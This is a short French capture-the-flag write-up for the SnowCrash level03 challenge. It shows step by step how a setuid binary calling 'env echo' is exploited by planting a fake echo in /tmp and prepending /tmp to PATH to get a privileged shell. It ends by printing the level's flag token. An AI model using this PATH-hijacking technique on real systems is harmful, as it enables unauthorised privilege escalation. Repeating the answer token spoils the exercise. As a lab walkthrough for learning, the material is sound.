860 B
860 B
Le flag 03 est enfin reelement de l'exploitation de binaire
Premiere chose que je lance un strings sur le binaire afin de voir si qui en ressort et vers ou chercher
/lib/ld-linux.so.2
KT{K
__gmon_start__
libc.so.6
_IO_stdin_used
setresgid
setresuid
system
getegid
geteuid
__libc_start_main
GLIBC_2.0
PTRh
UWVS
[^_]
/usr/bin/env echo Exploit me
...
Je vois que /usr/bin/env echo est appeler (env ce base sur le l'environnement de mon user actuel)
Je tente de faire un fichier dans mon home, mais ca ne met pas permis
Je tente donc dans le /tmp
ce qui fonctionne et decide donc d'ouvrir un shell
cat /tmp/echo
bash
export PATH="/tmp:$PATH"
chmod 777 /tmp/echo
./level03
Je me retrouve donc directement sur le shell de level03
flag03@SnowCrash:~$ getflag
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus